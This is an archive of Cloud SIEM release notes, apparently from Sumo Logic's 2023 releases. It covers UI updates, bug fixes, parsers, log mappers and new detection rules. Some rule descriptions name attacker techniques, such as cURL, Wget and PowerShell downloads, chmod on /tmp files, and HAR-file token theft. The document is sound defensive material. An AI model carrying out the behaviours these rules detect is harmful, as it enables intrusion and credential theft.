Skip to main content

Minor changes and enhancements

  • [New] Continuing our work to better align the Cloud SIEM UI pages with Log Analytics UI pages to improve usability and provide a consistent user experience, the color palette has been adjusted slightly, some page decoration has been removed or altered, and some controls have been updated.
  • [New] On the Entity list page, you can now filter by reputation indicator (i.e. Malicious, Suspicious or NotFlagged).
  • [New] Users can now navigate directly from the Entity Activity panel on the HUD to the Entity List page, with the proper filter pre-applied.
  • [Updated] The Object Type attribute has been added back to the Signal summary section, next to the timestamp, so that it is visible whether the Signal details are expanded or collapsed.
  • [New] A user-editable Description field has been added to Rule Tuning Expressions.

Bug fixes

  • Sorting by value was not working properly on the Entities list page.
  • Sometimes, if the target value was left blank (default), domain normalization would append a colon to the resulting value.
  • Customers were experiencing rate limiting with VirusTotal due to a change to their API and constant retries due to resultant errors in Cloud SIEM. This has been resolved, as has an issue with enrichments for file hashes.
  • Some Entities were not showing as being included in Entity Groups properly (even though attributes had been set correctly).
  • The MITRE ATT&CK® stage attribute was missing from some Signals in the audit logs.
  • Custom inventory sources were not included in the appropriate dropdown in Entity Group configuration.
  • On the Entity Details page, if the only Signals that existed were in Prototype mode, they would not be visible.
  • The reputation indicator on the Entity Details page was being rendered, then hidden.

This release includes new log mapping and parsing content for Druva Cyber Resilience:

Log Mappers

  • [New] Druva Cyber Resilience - Admin Logon
  • [New] Druva Cyber Resilience - Catch All

Parsers

  • [New] /Parsers/System/Druva/Druva Cyber Resilience

Bug Fixes

  • Recently, two rules, FIRST-S00052 and FIRST-S00049, were released to customers erroneously. Soon after, these rules started generating false positive Signals and Insights. We have removed those rules from all customer environments so they can be tuned properly and re-released after comprehensive testing. The process error that led to the release has been identified and corrected. Sumo Logic apologizes for the inadvertent Signals and Insights this error generated. If needed, please contact Support for assistance in closing the Insights.

This release includes new parsing and mapping support for C2C sources and mapping changes enumerated below.

Log Mappers

  • [New] Trellix mVision ePO Threats
  • [New] Zero Networks Segment Audit Activity
  • [New] Zero Networks Segment Network Activity
  • [Updated] AzureActivityLog 01
    • Remapped Application from properties.clientAppUsed to properties.appDisplayName for consistency

Parsers

  • [New] /Parsers/System/Trellix/Trellix MVision EPO
  • [New] /Parsers/System/Zero Networks/Zero Networks Segment

This release includes minor mapping adjustments to Duo and MS Graph Identify Protection Risk logs. Specific changes are enumerated below.

Log Mappers

  • [Updated] Duo Security Admin API - Audit
    • Added mappings for source host and source IP
  • [Updated] Duo Security Admin API - Authentication
    • Added mappings for source host and source IP
  • [Updated] Duo Security Admin API - Non-User Audit Changes
    • Added mappings for source host and source IP
  • [Updated] Duo Security Admin API - Targeted User Audit Changes
    • Added mappings for source host and source IP
  • [Updated] Microsoft Graph Identity Protection API C2C - riskDetections
    • Added principal as primary user_username key
  • [Updated] Microsoft Graph Identity Protection API C2C - riskyUsers
    • Added principal as primary user_username key
tip

For all the up-to-date Cloud SIEM content, see the Cloud SIEM Content Catalog.

This content release includes updates to Cloud SIEM rules, new log mappers, new parsers, and the addition of normalization schema metadata. Specific updates are enumerated below. In addition, a number of rules were updated to include more accurate MITRE ATT&K® tactic and technique tags.

Rules

  • [Updated] MATCH-S00213 AWS CloudTrail - Reconnaissance related event
    • Updated name expression to reduce insight false positivity
  • [Updated] MATCH-S00686 Base64 Decode in Command Line
  • [Updated] MATCH-S00373 BlueMashroom DLL Load
  • [Updated] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [Updated] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [Updated] FIRST-S00013 First Seen Driver Load - Global
  • [Updated] FIRST-S00014 First Seen Driver Load - Host
  • [Updated] FIRST-S00030 First Seen Outbound Connection to External IP Address on Port 445 from IP Address
  • [Updated] MATCH-S00705 Registry Modification - Authentication Package
  • [Updated] MATCH-S00707 Registry Modification - Winlogon Helper DLL
  • [Updated] MATCH-S00840 Suspicious Lambda Function - IAM Policy Attached
  • [Updated] MATCH-S00279 TAIDOOR RAT DLL Load
  • [Updated] MATCH-S00379 WMIExec VBS Script
  • [Updated] MATCH-S00570 WMIPRVSE Spawning Process
    • Corrected expression to exclude OS SID from user_userId; prior expression was incorrectly referencing SubjectLogonID
  • [Updated] MATCH-S00724 Windows Update Agent DLL Changed
  • [Updated] MATCH-S00435 XSL Script Processing

Log Mappers

  • [New] 1Password Item Audit Actions
  • [New] 1Password Item Usage Actions
  • [New] Zeek DNS Activity
  • [New] Zeek HTTP Activity
  • [New] Zeek conn Activity

Parsers

  • [New] /Parsers/System/1Password/1Password
  • [New] /Parsers/System/1PasswordC2C/1PasswordC2C
  • [New] /Parsers/System/Zeek/Zeek

Schema

  • [New] metadata_sourceBlockId
    • The _blockId of the original source log message (from Sumo Logic)

This is an archive of 2023 Cloud SIEM Release Notes. The current Cloud SIEM Release Notes are here.

To view the full archive, click here.


December 14, 2023 - Application Update

Minor changes and enhancements

  • [New] A new attribute section has been added to Signal and Insight details returned by the API endpoints GET /signals/{id} and GET /insights/{id}. The section will include the log search string (along with start and end times) that you can use to retrieve the queried records for a given Signal. The stanza looks like this:

    "recordSearchDetails": {
    "query": "{string}",
    "queryStartTime": "{timestamp}",
    "queryEndTime": "{timestamp}"
    },

Bug fixes

  • Some users were seeing duplicate schema tags (with an extra "s" at the end) in the UI.
  • In some scenarios, the UI would react slowly when users attempted to enter comments for Insights.
  • The UI was not properly enforcing the 100 character limit for rule names (and instead displaying an unknown error if the user attempted to set a rule name that was too long).

December 6, 2023 - Application Update

Automation Service Enhancements

The Automation Service has been updated to include several new enhancements:

  • Containment action types are now supported. Typically, these actions will perform some sort of response or remediation action, such as resetting a user's password or blocking a domain on your firewall. Many integrations in App Central now include containment actions.
  • User Choice nodes (and manual steps) are now supported. When executing a playbook if a user choice node is encountered, the execution will pause until a user selects an option. For example, after enrichment, a user could be asked whether to proceed with a containment action or to perform additional enrichment first. When a playbook is paused at a user choice node, the status of that playbook will say Waiting user interaction.
  • In the initial release of the Automation Service, playbooks would not appear in the Create New Automation Cloud SIEM dialog unless they defined as type CSE. This restriction has been lifted; all playbooks will now appear in the dropdown.

For full details, see the Automation Service documentation.

Minor Changes and Enhancements

  • [New] Entity Groups now support second-level unnormalized attributes (fields.<attribute>.<attribute>).
  • [New] Log Mappings can now be enabled or disabled via API using the PUT /log-mappings/{*id*}/enabled endpoint.
  • [New] The Record Count field on Sumo Logic-provided Chain Rules can now be overridden (like other Rule fields).

Bug Fixes

  • Users were unable to manually change the Criticality assigned to an Entity.
  • Users were getting a 500 error when attempting to duplicate a rule.

Rule Expression Validation

When writing Rules and Rule Tuning Expressions, it's possible to write an expression that is syntactically correct (and passes validation) but that will still fail when executed. There are two specific cases we have identified:

  • Using a non-normalized field that does not exist in the log records (schema fields will always exist)
  • Introducing a type mismatch (that is, matching a string to an integer value)

If you test a Rule (from the Rules Details page), an error will be displayed in these cases, but the error is not obvious and not clear, and the normal editor validation does not catch these kinds of errors.

In addition, while the Cloud SIEM Rules engine does not generate runtime errors in these cases (there just isn't a match), the Log Search engine does generate errors and refuses to return any results in these cases.

A few weeks ago, we made a change to Signal and Insight detail pages, where for multi-signal Rules (such as Chain Rules), where we would attach a subset of rules on the details page and the user would have to go to the Queried Records tab to view any other potentially related records, we combined those views and began showing both the attached and queried records on the main page. Unfortunately, the way the new design worked, no records were displayed if the queried record log search failed.

As a result of these issues, we have made two changes:

  • On the Rules Details page, if the test (a log search) returns an error, instead of saying "No Records Found," the screen will say, "Check the Rule/Tuning Expressions."
  • On the Signal and Insight Details pages, all attached record(s) will be displayed even if the log search query cannot be completed.

Note that fixing the rule expression(s) will not fix any Signals or Insights that have already been generated; you will have to use the View in Log Search feature and manually fix the log search string to see the log records.

Other tips:

  • A malformed tuning expression will affect any rule that it is associated with, whether provided by Sumo Logic or custom-written.
  • We highly recommend using only schema fields in your rule and tuning expressions.
    • Sumo Logic's parsers and mappers are updated weekly, so please contact Support if you need to add a mapping from the raw log format to the normalized schema.
    • Sumo Logic's schema is extensible, so please contact Support if there's a field you'd like to add.
    • Links from the legend for the new Insights by Status panel on the HUD were not enabled properly.

November 13, 2023 - Content Release

This release includes the changes and enhancement enumerated below:

Rules

  • [New] MATCH-S00894 HAR file creation observed on host
    • HAR files contain session telemetry and network traffic. These file types are typically generated using the "developer tools" options on modern browsers like Chrome, Edge, or Firefox. These files may contain various sensitive data such as session keys, tokens, or cookies which may be extracted by a threat actor in order to access systems which the keys, tokens, or cookies in the HAR files have access to. Ensure that this operation is expected and ensure to sanitize the HAR file of any sensitive credential material.

Log Mappers

  • [Updated] Microsoft Office 365 Exchange Mailbox Audit Events
    • Maps client field to resource.

Parsers

  • [Updated] /Parsers/System/Microsoft/Office 365
    • Enhanced user agent parsing.
  • [Updated] /Parsers/System/Microsoft/Windows-JSON-Open Telemetry
    • Adds support for forthcoming format change and fixes event ID formulation breaking mapping.

November 2, 2023 - Content Release

This content release includes new out-of-the-box parsing and mapping support for Claroty xDome in CEF. Additionally, parser templates were updated to remove extraneous commenting in uncommented parser templates.

Log Mappers

  • [New] (Claroty xDome) Alert
  • [New] (Claroty xDome) Communications Events
  • [New] (Claroty xDome) Vulnerability

Parsers

  • [New] /Parsers/System/Claroty/Claroty xDome CEF
  • [Updated] /Parsers/System/Parser Templates/CEF Template Commented
  • [Updated] /Parsers/System/Parser Templates/JSON Template
  • [Updated] /Parsers/System/Parser Templates/Key Value Pair Template
  • [Updated] /Parsers/System/Parser Templates/Unstructured Template Commented
  • [Updated] /Parsers/System/Parser Templates/Windows XML Template
  • [Updated] /Parsers/System/Parser Templates/XML Template

November 1, 2023 - Application Update

Multi-Record Signal Changes

To improve the usability of the Signals user interface, we've changed the way that records are displayed on Signals generated by multi-record (Threshold, Chain, and Aggregation) Rules. Instead of attaching a sample set of records to the Signal and then providing a Queried Record tab to manually search for additional records, all records that were part of the Signal will be displayed in the UI. (As a result, the Queried Records tab has been removed from the UI.)

Behind the scenes, we will attach the first record directly to the Signal (in the API and sec_signal index, this is listed in the allRecords section). In the UI, the other records will be gathered via an automatic background log search. (In the API and shortly in the sec_signal index, any involved Entities - up to a maximum of 100 - will be included in a new involvedEntities section.)

In addition, the number of attached records has been removed from the Signals list view, since it will now always be 1.

This change will also bring an enhancement for Outlier Rule Signals. Previously those Signals would only show a single record, but with this change they will also show all related records as well.

This change has no effect on the Rules themselves; they will continue to operate as before.

Automation Service Audit Logging

The Automation Service has been updated to include support for Audit Logging. Events like updates to integrations and playbook execution will now be automatically logged to the standard Sumo Logic Audit Logging indices.

For full details, see the Cloud SOAR documentation (the Automation Service will log a subset of those events).

Bug Fixes

  • In some cases, Insights would appear to be open after they had been closed/resolved.

October 26, 2023 - Content Release

This content release includes templates for creating Cloud SIEM parsers. There are two versions of each, one with comments that explain the purpose of each parser component, and “clean” versions that you can use to start quickly creating custom parsers. Further documentation on using these parsers will be available on Sumo Logic Docs in the coming weeks. Other changes in this release are enumerated below.

Rules

  • [New] FIRST-S00047 First Seen ASN Associated with User for a Successful Azure AD Sign In Event
    • This rule will trigger when a new ASN value is associated with a successful Entra ID sign-in event for a particular username since the baseline period. This may be suspicious activity as a user's IP address may change periodically, but typically users authenticate from a set of ASNs (one ASN value for their home network, another ASN value for their mobile device). A sign in with a new ASN not seen since the baseline period could be indicative of credential theft. Look at other events occurring for the user in question for the same time period to ascertain whether access was malicious or benign.
  • [New] FIRST-S00048 First Seen Azure Device Code Authentication from User
    • Azure Device Code authentication can be utilized in phishing attacks. This specific rule looks for a user performing device code authentication to an Azure resource for the first time since the baseline period. If this action is not expected, it could be a sign of malicious activity. Examine the event for odd user agent values and look at what other actions the affected account is performing within the Azure estate.
  • [Updated] MATCH-S00891 Azure OAUTH Application Consent from User
    • Fixed mismatched description and summary fields
  • [Updated] MATCH-S00832 Office 365 Inbox Rule Updated
    • Added fix to exclude blank or null rules

Parsers

  • [New] /Parsers/System/Parser Templates/CEF Template
  • [New] /Parsers/System/Parser Templates/CEF Template Commented
  • [New] /Parsers/System/Parser Templates/CSV Template
  • [New] /Parsers/System/Parser Templates/CSV Template Commented
  • [New] /Parsers/System/Parser Templates/JSON Template
  • [New] /Parsers/System/Parser Templates/JSON Template Commented
  • [New] /Parsers/System/Parser Templates/Key Value Pair Template
  • [New] /Parsers/System/Parser Templates/Key Value Pair Template Commented
  • [New] /Parsers/System/Parser Templates/LEEF Template
  • [New] /Parsers/System/Parser Templates/LEEF Template Commented
  • [New] /Parsers/System/Parser Templates/Unstructured Template
  • [New] /Parsers/System/Parser Templates/Unstructured Template Commented
  • [New] /Parsers/System/Parser Templates/Windows XML Template
  • [New] /Parsers/System/Parser Templates/Windows XML Template Commented
  • [New] /Parsers/System/Parser Templates/XML Template
  • [New] /Parsers/System/Parser Templates/XML Template Commented

October 26, 2023 - Application Update

Enhanced Support for Custom Insight Statuses

Sumo Logic is pleased to announce two enhancements to Cloud SIEM related to custom Insight statuses.

First, the In Progress status can now be disabled (not deleted). Many customers create multiple statuses that all represent an "In Progress" state, so this option can help reduce confusion in those cases.

Second, while Cloud SIEM has long supported custom Insight statuses, Insights in any custom status have been reported together (as one group on the HUD or using the same color in other instances). To improve this experience, custom statuses can now be assigned a unique color:

Custom Insight Status Color Palette

This color will be used wherever an Insight is displayed with that status (such as in the Insight list and board views). For existing custom statuses, the color will remain white (as it has been) until the configuration is changed.

The HUD has been updated as well; for example, the Insights by Status widget has been updated to properly display each status instead of grouping custom statuses together:

Updated HUD Widget for Custom Insight Statuses

A corresponding attribute (color) has also been added to the custom status API.

Minor Changes and Enhancements

  • [New] Searches in Cloud SIEM (from the top menu bar) are now case-insensitive.
  • [New] Custom match list columns now support unnormalized attributes (like fields.foo)
  • [New] The records search page in Cloud SIEM now includes a link to view the equivalent search in the Log Analytics Platform log search page.
  • [Updated] When a comment is added to an Insight by an Action from the Automation Service, it will be attributed to a system user called "Automation Service".

Bug Fixes

  • The Insight data forwarded to the Automation Service did not include the full set of attributes for attached Signals.
  • Some hostnames in CrowdStrike FDR inventory sources were not getting normalized properly.
  • Entity Groups were being applied to the wrong Entity types.
  • Duplicate audit log entries for Insights were being created. (Note that while this has been resolved, the duplicate entries have not been removed from customer audit logs.)
  • When entering closing an Insight, users can enter comments and the UI will suggest content based on comment history. These suggestions were broken and have been reset.
  • When configuring Entity Groups, the UI was not allowing users to specify unnormalized inventory attributes (like fields.foo).

October 18, 2023 - Application Update

Legacy Signal Forwarding Deprecation

Since July 2022, Signals generated by Cloud SIEM are automatically saved in a standardized sec_signal index. This special partition is similar to the existing sec_record indices in that, unlike data retained using the legacy Signal Forwarding feature, it is stored in a format that supports keyword search, nested attributes, and other standard log search features.

The new index is automatically generated and retained for a period of 2 years at no additional cost for all Cloud SIEM customers.

As a result, the optional legacy Signal Forwarding feature in Cloud SIEM will be deprecated on November 15, 2023. Existing data will not be deleted, but new Signals generated after that date will no longer be forwarded using that feature and the option will no longer be available. (Signals will continue to be forwarded automatically to sec_signal.) Customers leveraging data forwarded using the legacy feature to generate dashboards (or for other use cases) will need to modify those applications to use the new sec_signal index before then. Note that the content of the sec_signal index is not identical to the content in data forwarded using the legacy option.

For more information about this change, and the differences between the two data sets, refer to our 2023 Cloud SIEM Signal Index Migration FAQ.


October 11, 2023 - Content Release

This content release contains rules mostly pertaining to Microsoft Azure OAUTH Application Registration, NSG, and Key Vault services. Pertinent to CVE-2023-38545 and CVE-2023-38546, this release also includes a new rule (FIRST-S00040 described below) to aid in detecting unusual cURL tool usage by a user as it may pertain to exploitation of these vulnerabilities.

Rules

  • [New] MATCH-S00891 Azure OAUTH Application Consent from User
    • A user has consented to application permissions.
  • [New] CHAIN-S00017 Change of Azure MFA Method followed by Risky SignIn
    • This alert looks for an Azure MFA authentication method change, followed by a risky sign in detected by Azure within a six hour time period for the same user account.
  • [New] FIRST-S00044 First Seen AppID Generating MailIItemsAccessed Event from User
    • This alert looks at a first seen application ID accessing an Office 365/Exchange mail box item. The MailItemsAccessed may not always be enabled within an Entra/Azure/Office 365 tenant and is dependent on Microsoft licensing requirements. See the following guide from CISA for additional information on this event type and investigation steps: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a.
  • [New] FIRST-S00046 First Seen Client Generating MailIItemsAccessed Event from User
    • This alert looks at a First Seen client accessing an Office 365/Exchange mail box item. The MailItemsAccessed may not always be enabled within an Entra/Azure/Office 365 tenant and is dependent on Microsoft licensing requirements. See the following guide from CISA for additional information on this event type and investigation steps: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a.
  • [New] FIRST-S00040 First Seen cURL execution from User
    • First Seen execution of cURL by a user from a device. The cURL tool is designed to retrieve files using various internet protocols in a programmatic manner; it is often abused by threat actors to download various files as part of broader executions. If this usage of cURL comes from an unexpected user, it is recommended that the command line value be reviewed and the URL which was used as part of cURL command be investigated.
  • [New] MATCH-S00888 Microsoft Teams External Access Enabled
    • Microsoft Teams External Access has been enabled; this setting allows any users that are external to your Teams/Office organization to message users that are within your Teams/Office organization. If this setting change is unplanned or unexpected it is recommended that this activity be reviewed. Microsoft Teams provides administrators the ability to allow only specific external domains to message users within the organization. Look for Office 365 events with the MessageSent or MemberAdded event names in order to gain more detail as to what users were invited to which Teams channels, if any.
  • [New] MATCH-S00889 Microsoft Teams Guest Access Enabled
    • Microsoft Teams Guest Access has been enabled globally; this setting allows any users that are external to your Teams/Office organization to be invited into your Teams/Office organization. If this setting change is unplanned or unexpected it is recommended that this activity be reviewed. MIcrosoft Teams provides administrators the ability to allow only specific guest actions to take place within the Teams/Office organization.
  • [New] MATCH-S00890 Owner Added to Azure Service Principal
    • An owner was added to an Azure service principal. Threat actors may add owners to Azure service principals for privilege escalation or persistence avenues. Ensure this action is expected and approved.
  • [New] MATCH-S00893 Secret Added to Azure Service Principal
    • Secrets can be added to Azure Service Principals as a persistence mechanism. The properties.targetResources.1.modifiedProperties.1.newValue field will have details regarding the secret or certificate added.
  • [New] MATCH-S00892 Value Added to Azure NSG Group
    • This alert looks for a value being added to an Azure Network Security Group (NSG) successfully. Depending on the environment, other Azure services such as Azure Firewall may provide egress and ingress controls. Ensure this activity is authorized and expected. The raw data for the event contains the exact values being modified.

October 2, 2023 - Application Update

MITRE ATT&CK® Threat Coverage Explorer

We are excited to announce a new feature in Cloud SIEM, the MITRE ATT&CK® Threat Coverage Explorer. This interactive tool gives you the ability to see how Rules, Signals, and log sources map to adversary actions using the MITRE ATT&CK® Matrix for Enterprise.

MITRE ATT&CK® Threat Coverage Explorer

The MITRE Explorer can be used to identify gaps in coverage and understand the impact of specific log sources and Rules to the overall threat coverage and value of Cloud SIEM.

The tool can be accessed in the Content Menu. It supports three different views:

  • Recent Activity - Your environment's actual coverage (Rules that generated Signals) over the past six months
  • All Community Activity - All Cloud SIEM customers' anonymized and aggregated coverage over the past six months.
  • Theoretical Coverage - Potential coverage if all rules are enabled and all log sources are connected.

The MITRE Explorer uses the built-in MITRE tactic, technique, and sub-technique tags to track coverage, so if custom Rules are tagged appropriately, they will also be included.

Clicking on a technique will open a detailed view which describes the technique (and any included sub-techniques) and lists the Rules and Signals that match.

The view is filterable by tactic, technique, and sub-technique, as well as log source and coverage level. There are multiple view options so the display can be customized, and the data can be exported in MITRE's JSON format so it can be combined with data from other tools to view your total coverage. There is also an API to retrieve coverage data and the JSON content.

For more details on how to use the MITRE Explorer, check out the online documentation.

Minor Changes and Enhancements

  • [New] When viewing Insight details, users can now select multiple Signals and remove them from the Insight with a single click.
  • [New] When viewing Entity inventory data, unnormalized fields with millisecond-based timestamps are now automatically converted to human-readable format when possible.
  • [New] Tag schemas and context actions can now be managed via Terraform. See the API documentation for details.

Bug Fixes

  • The ability to add items to a Match List via Terraform was not working properly.
  • Timestamps on the Entity Timeline were using different time zones.
  • A UI error was preventing users from overriding some fields on First Seen and Outlier Rules.

September 22, 2023 - Content Release

This content release includes new parsing, mapping, and passthrough rule support for Qualys Vulnerability Data as well as changes enumerated below.

Rules

  • [New] MATCH-S00887 Port Forwarding Enabled via Visual Studio Code
    • A local port has been forwarded and made available for external connectivity utilizing the Visual Studio Code port forwarding feature

Log Mappers

  • [New] Qualys Vulnerability Data
  • [Updated] Windows - Security - 4886
    • Adds alternate fields for user_username and device_hostname
  • [Updated] Windows - Security - 4887
    • Adds alternate fields for user_username and device_hostname

Parsers

  • [New] /Parsers/System/Qualys/Qualys Vulnerability Data

September 21, 2023 - Application Update

Entity Groups Inventory Enhancements

We are happy to announce some important enhancements to the Entity Group feature in Cloud SIEM.

With this release, Entity Groups can now use any attribute available in your inventory data - including non-normalized attributes. (Previously, only the group attribute was available.) Non-normalized attributes can be used by adding the fields. prefix.

In addition, the release introduces the ability to auto-set schema tag values on matching Entities based on the value of a given inventory attribute. In this example, any user Entity that has a value for location in inventory data will have that value set in a tag (such as Location:Austin).

Entity Group Details Panel

When using dynamic schema tags, you can still set static tags, criticality, and suppression state.

These two enhancements will reduce the number of Entity Groups needed to properly configure your Entities automatically and will automate a more complete and accurate set of Entity attributes, improving Rule and Analyst efficiency.

There much more information about Entity Groups and these enhancements in the online documentation.

Bug Fixes

  • Multiple entries were being added to the audit log when some Insights were created.
  • Some Insights were not getting enriched with VirusTotal using the direct integration.
  • Time-to-live was temporarily considered a mandatory attribute for match lists.

September 11, 2023 - Application Update

Automation Service

Sumo Logic is excited to announce that the Automation Service for Cloud SIEM is now generally available for all Cloud SIEM customers. The Automation Service uses Cloud SOAR capabilities -- without needing Cloud SOAR itself -- to allow you to define and automate smart actions, including enrichments and notifications. These actions can be automatically triggered when certain events occur in Cloud SIEM, helping you to quickly investigate, understand, and react to potential security threats.

You can interact with the service through automations, which execute playbooks. Playbooks are composed of one or more actions with a workflow that could include parallel actions and logic steps. Actions are defined as part of integrations with specific internal and external applications. Sumo Logic provides hundreds of integrations, actions, and playbooks out of the box that you can use and customize. You can also create your own.

Automation Service

Automations are accessible through the Configuration menu, under Integrations. Automation results are accessible from Insight and Entity detail pages.

The Automation Service does not include the full capabilities of Cloud SOAR. For example, the Automation Service only supports enrichment, nofification, and custom action types, and Automation Service playbooks can only be triggered from Cloud SIEM. There is also a limit to the number of actions you can run per hour. However, if you do have Cloud SOAR, then once you have upgraded to the Fall 2023 release of Cloud SOAR (currently in Beta), Cloud SIEM will use it to run automations instead of the Automation Service, giving Cloud SIEM access to the full capabilities of Cloud SOAR.

Over time, the legacy Insight Actions and Cloud SIEM Enrichment Service features will be deprecated in favor of this new service. (The new service includes integrations and actions corresponding to the legacy Insight Actions and can run existing Enrichment Service PowerShell scripts. The online documentation has more information about migrating.) Note that the Automation Service is not yet available in the FedRAMP environment.

There is much more information about the Automation Service and how to use it in the online documentation.

Minor Changes and Enhancements

  • [New] Tag schemas and context actions can now be managed via API (/tag-schemas and /context-actions). See the API documentation for details.
  • [Updated] Threat indicator icons will now appear where appropriate in the Active Entities panel on the HUD.

Bug Fixes

  • Some records were not being auto-enriched with Network Block data.
  • Some internal IP addresses were being marked as external.
  • The HUD was not updating Insight status counts in a timely fashion.
  • Window size was not saving correctly when defining a new Outlier rule.

September 7, 2023 - Content Release

This release includes new detections for macOS systems and mapping support for Dataminr Alerts. It also includes fixes aimed to reduce false positivity and correct the transposition of description and summary on several rules. Other changes are enumerated below.

Rules

  • [New] CHAIN-S00016 macOS - Suspicious Osascript Execution and Network Activity
  • [New]* FIRST-S00039 First Seen mdfind Usage from User
  • [New]* FIRST-S00041 First Seen networksetup Usage from User
  • [New]* FIRST-S00042 First Seen Ioreg Usage from User
  • [New]* FIRST-S00043 First Seen pbpaste Usage from User
  • [New] MATCH-S00878 macOS - Suspicious Osascript Parent Execution
  • [New] MATCH-S00879 macOS - Suspicious Osascript Execution
  • [New] MATCH-S00880 macOS - Entitlement Enumeration via Xattr
  • [New]* MATCH-S00881 macOS - csrutil status Usage Detected
  • [New] MATCH-S00882 macOS - System Preference Enumeration via Security Binary
  • [New] MATCH-S00883 macOS - Keychain Enumeration
  • [New] MATCH-S00884 macOS - Suspicious Python PIP Execution
  • [New] MATCH-S00885 macOS - Screen Sharing Session Established
  • [New]* MATCH-S00886 Suspicious chmod Execution

* These rules were originally released September 1, but have been updated in this release.

Log Mappers

  • [New] Dataminr Alerts
  • [Updated] Squid Proxy - Parser
    • Updated mapper to take advantage of additional parsed data (see parser updates)

Parsers

  • [Updated] /Parsers/System/Squid/Squid Proxy Syslog
    • Updated parser to extract port and protocol information from URL when present

August 22, 2023 - Content Release

This release contains updates to MITRE tags used in several rules that have been deprecated, removed, or were otherwise invalid. Other changes are enumerated below.

Rules

  • [New] MATCH-S00886 Suspicious chmod Execution
    • This alert looks for a "chmod" execution on a file that is found on the /tmp directory of a Linux or macOS host. Threat actors may download and copy files to this directory and add execution bits or change permissions on these files.
  • [Updated] MATCH-S00516 Antivirus Ransomware Detection
  • [Updated] MATCH-S00534 MacOS - Re-Opened Applications
  • [Updated] MATCH-S00149 PowerShell File Download
  • [Updated] MATCH-S00342 Suspicious use of Dev-Tools-Launcher

Log Mappers

  • [Updated] Microsoft Defender for Cloud - Security Alerts
    • Adds support for Security Alerts via Azure Activity Log
  • [Updated] Zscaler - Nanolog Streaming Service - JSON
    • Adds alternate values for NSS mappers to ensure proper normalization
  • [Updated] Zscaler Firewall
    • Adds alternate values for ZScaler Firewall mappers to ensure proper normalization

August 22, 2023 - Application Update

Deprecation Notice

After careful evaluation, we have deprecated Grok patterns immediately for customers who've not used the feature in the last 30 days. Our more robust and configurable solution is already available for customers in the Sumo Logic parsers. More details on how parsing works in Sumo Logic can be found in the Parsing Language Reference Guide.

For customers who are still using Grok, further communication along with a path to migrate to the Sumo Logic parsers will be provided in the coming weeks.


August 4, 2023 - Content Release

This release includes minor updates and a new log mapper for Microsoft Defender.

Rules

  • [Updated] MATCH-S00231 Azure - Member Added to Company Administrator Role
    • Updated expression to account for parser and vendor schema changes
  • [Updated] THRESHOLD-S00097 Impossible Travel - Successful
    • Removed vendor/product grouping
  • [Updated] THRESHOLD-S00098 Impossible Travel - Unsuccessful
    • Removed vendor/product grouping
  • [Updated] MATCH-S00167 Recon Using Common Windows Commands
    • Bug fix for Qualys path exclusion not working

Log Mappers

  • [New] Microsoft Defender for Cloud - Security Alerts
    • Support for new log schema

Parsers

  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
    • Added additional time format

August 3, 2023 - Content Release

This release includes updated MITRE ATT&CK™ technique tags on several rules and added support for Microsoft Graph Security Alert API 1.0 via C2C.

Rules

  • [Deleted] OUTLIER-S00012 Spike in AWS New Service Creation or Port Connection from Source Address
    • As advised in the advanced notice on July 14th, 2023 - this Outlier rule was deleted due to performance and efficacy findings.
  • [Updated] MATCH-S00679 AWS Route 53 Domain Registered
  • [Updated] FIRST-S00038 First Seen Wget Usage from User
  • [Updated] MATCH-S00830 Office 365 Forwarding Rule Created
  • [Updated] LEGACY-S00064 Potentially vulnerable software detected
  • [Updated] LEGACY-S00086 SSL Certificate Not Valid Yet
  • [Updated] LEGACY-S00087 SSL Heartbleed Attack
  • [Updated] LEGACY-S00089 SSL Heartbleed Many Requests
  • [Updated] LEGACY-S00090 SSL Heartbleed Odd Length
  • [Updated] LEGACY-S00091 SSL Invalid Server Cert
  • [Updated] LEGACY-S00096 Shellshock

Log Mappers

  • [New] Microsoft Graph Security Alert API C2C

Parsers

  • [New] /Parsers/System/Microsoft/Graph Security Alert API

July 21, 2023 - Content Release

This release includes:

  • Removal of unused legacy parsers and directly associated mappers and rule content.
  • Support for Windows Event Log JSON ingested via Open Telemetry collector. XML and JSON via OTel are now fully supported in Cloud SIEM.

Rules

  • [New] FIRST-S00038 First Seen Wget Usage from User
    • Observes for execution of Wget from a user for the first time since the baseline period (14 days).
  • [Updated] LEGACY-S00009 Bluecoat Proxy - Suspicious or Malicious Categories
    • Fix to account for minor difference from legacy parser to current parser.
  • [Updated] FIRST-S00016 First Seen Non-Network/Non-System Logon from User
    • Excludes LogonTypes for System Startup, Batch, and Service to reduce volume of records matching.
  • [Deleted] MATCH-S00073 Palo Alto - Traps Templated Events

Log Mappers

  • [Updated] AWS Security Hub
    • Lowered normalizedSeverity to reduce false positivity of passthrough signals.
  • [Updated] CrowdStrike Falcon Identity Protection (CNC)
    • Adjusted IdentityProtectionEvent normalizedSeverity to use INFO, LOW, MEDIUM, and HIGH instead of numeric values to improve consistency.
  • [Updated] Windows - Security - 4627
    • Added mapping for logonType '0' representing a system startup.
  • [Deleted] AD Audit DNS
  • [Deleted] AD Audit Comp
  • [Deleted] AD Audit LDAP
  • [Deleted] AD Audit Local Logon
  • [Deleted] AD Audit Server
  • [Deleted] AD Audit User
  • [Deleted] Blue Coat Proxy 1
  • [Deleted] Blue Coat Proxy 3
  • [Deleted] Cisco Firepower Malware Event 430005
  • [Deleted] Cisco Ironport WSA NOHD 02
  • [Deleted] Citrix Xenserver Auth Message
  • [Deleted] Cylance_Audit_1
  • [Deleted] Cylance_Audit_2
  • [Deleted] Ironport Cisco
  • [Deleted] LINUX Root Login
  • [Deleted] LINUX Root Login with Username
  • [Deleted] LINUX User Authenticated
  • [Deleted] LINUX User Authenticated no Username
  • [Deleted] LINUX User Session Open/Close
  • [Deleted] Palo Alto Traps Misc
  • [Deleted] Symantec SEP Compressed File
  • [Deleted] Symantec SEP MEM System
  • [Deleted] Symantec SEP Potential Risk Found 04
  • [Deleted] Symantec SEP Security Risk Found 2
  • [Deleted] Symantec SEP Sonar Detection Variation 2
  • [Deleted] Symantec SEP Virus Found
  • [Deleted] Tanium S05 Logs

Parsers

  • [New] /Parsers/System/Microsoft/Windows-JSON-Open Telemetry

Legacy Parsers

  • [Deleted] ADAUDIT_COMP
  • [Deleted] ADAUDIT_DNS
  • [Deleted] ADAUDIT_LDAP
  • [Deleted] ADAUDIT_LOCAL_LOGON
